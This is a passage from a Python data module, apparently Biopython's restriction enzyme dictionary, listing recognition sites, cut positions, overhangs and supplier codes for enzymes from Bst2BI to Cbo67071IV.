'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Bst2BI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<Bst2UI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bst2UI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<Bst4CI>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bst4CI'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<Bst6I>CTCTTC))|(?=(?P<Bst6I_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bst6I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<BstACI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstACI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<BstAFI>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstAFI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCANNNNNTGC'),
'compsite': '(?=(?P<BstAPI>GCA.....TGC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCANNNNNTGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['BstAPI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGTACA'),
'compsite': '(?=(?P<BstAUI>TGTACA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGTACA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstAUI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'YACGTR'),
'compsite': '(?=(?P<BstBAI>[CT]ACGT[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YACGTR',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstBAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<BstBI>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BstBI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNNGC'),
'compsite': '(?=(?P<BstC8I>GC..GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstC8I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTNAG'),
'compsite': '(?=(?P<BstDEI>CT.AG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTNAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstDEI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCRYGG'),
'compsite': '(?=(?P<BstDSI>CC[AG][CT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRYGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstDSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<BstEII>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('C', 'J', 'N', 'R'),
}
rest_dict['BstEII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCTNNNNNAGG'),
'compsite': '(?=(?P<BstENI>CCT.....AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNNNNNAGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstENI'] = _temp()
def _temp():
return {
'charac': (7, 0, None, None, 'GGATG'),
'compsite': '(?=(?P<BstF5I>GGATG))|(?=(?P<BstF5I_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstF5I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<BstFNI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstFNI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGCGCY'),
'compsite': '(?=(?P<BstH2I>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstH2I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<BstHHI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstHHI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GATC'),
'compsite': '(?=(?P<BstKTI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstKTI'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<BstMAI>GTCTC))|(?=(?P<BstMAI_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstMAI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<BstMBI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstMBI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<BstMCI>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstMCI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCNNNNNNNGC'),
'compsite': '(?=(?P<BstMWI>GC.......GC))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNNNNNNGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstMWI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<BstNI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BstNI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RCATGY'),
'compsite': '(?=(?P<BstNSI>[AG]CATG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCATGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstNSI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACNNNNGTC'),
'compsite': '(?=(?P<BstPAI>GAC....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstPAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<BstPI>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BstPI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCNGG'),
'compsite': '(?=(?P<BstSCI>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCNGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstSCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTRYAG'),
'compsite': '(?=(?P<BstSFI>CT[AG][CT]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TRYA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRYAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstSFI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GKGCMC'),
'compsite': '(?=(?P<BstSLI>G[GT]GC[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'KGCM',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCMC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstSLI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TACGTA'),
'compsite': '(?=(?P<BstSNI>TACGTA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGTA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstSNI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<BstUI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BstUI'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<BstV1I>GCAGC))|(?=(?P<BstV1I_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BstV1I'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BstV2I>GAAGAC))|(?=(?P<BstV2I_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstV2I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<BstX2I>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BstX2I'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'CCANNNNNNTGG'),
'compsite': '(?=(?P<BstXI>CCA......TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNNTGG',
'size': 12,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'V', 'X', 'Y'),
}
rest_dict['BstXI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<BstYI>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BstYI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTATAC'),
'compsite': '(?=(?P<BstZ17I>GTATAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BstZ17I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<BstZI>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['BstZI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<Bsu15I>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsu15I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<Bsu36I>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Bsu36I'] = _temp()
def _temp():
return {
'charac': (12, 5, None, None, 'GTATCC'),
'compsite': '(?=(?P<BsuI>GTATCC))|(?=(?P<BsuI_as>GGATAC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BsuI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BsuRI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I'),
}
rest_dict['BsuRI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BsuTUI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BsuTUI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCRYGG'),
'compsite': '(?=(?P<BtgI>CC[AG][CT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRYGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BtgI'] = _temp()
def _temp():
return {
'charac': (16, 14, None, None, 'GCGATG'),
'compsite': '(?=(?P<BtgZI>GCGATG))|(?=(?P<BtgZI_as>CATCGC))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BtgZI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCNGC'),
'compsite': '(?=(?P<BthCI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'CNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BthCI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTC'),
'compsite': '(?=(?P<BtrI>CACGTC))|(?=(?P<BtrI_as>GACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BtrI'] = _temp()
def _temp():
return {
'charac': (7, 0, None, None, 'GGATG'),
'compsite': '(?=(?P<BtsCI>GGATG))|(?=(?P<BtsCI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BtsCI'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAGTG'),
'compsite': '(?=(?P<BtsI>GCAGTG))|(?=(?P<BtsI_as>CACTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BtsI'] = _temp()
def _temp():
return {
'charac': (7, 0, None, None, 'CAGTG'),
'compsite': '(?=(?P<BtsIMutI>CAGTG))|(?=(?P<BtsIMutI_as>CACTG))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGTG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BtsIMutI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCGCGA'),
'compsite': '(?=(?P<BtuMI>TCGCGA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BtuMI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACNNNNNTGG'),
'compsite': '(?=(?P<Bve1B23I>GAC.....TGG))|(?=(?P<Bve1B23I_as>CCA.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bve1B23I'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<BveI>ACCTGC))|(?=(?P<BveI_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BveI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNNGC'),
'compsite': '(?=(?P<Cac8I>GC..GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Cac8I'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CAGNNNCTG'),
'compsite': '(?=(?P<CaiI>CAG...CTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGNNNCTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['CaiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGTTAG'),
'compsite': '(?=(?P<Cal14237I>GGTTAG))|(?=(?P<Cal14237I_as>CTAACC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTTAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cal14237I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRTTRAG'),
'compsite': '(?=(?P<CalB3II>G[AG]TT[AG]AG))|(?=(?P<CalB3II_as>CT[CT]AA[CT]C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRTTRAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CalB3II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTAAT'),
'compsite': '(?=(?P<Cau10061II>GTTAAT))|(?=(?P<Cau10061II_as>ATTAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cau10061II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<CauII>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CauII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGGAAT'),
'compsite': '(?=(?P<Cba13II>AGGAAT))|(?=(?P<Cba13II_as>ATTCCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cba13II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCTNAYNC'),
'compsite': '(?=(?P<Cba16038I>CCT.A[CT].C))|(?=(?P<Cba16038I_as>G.[AG]T.AGG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAYNC',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cba16038I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCRGAAG'),
'compsite': '(?=(?P<Cbo67071IV>GC[AG]GAAG))|(?=(?P<Cbo67071IV_as>CTTC[CT]GC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
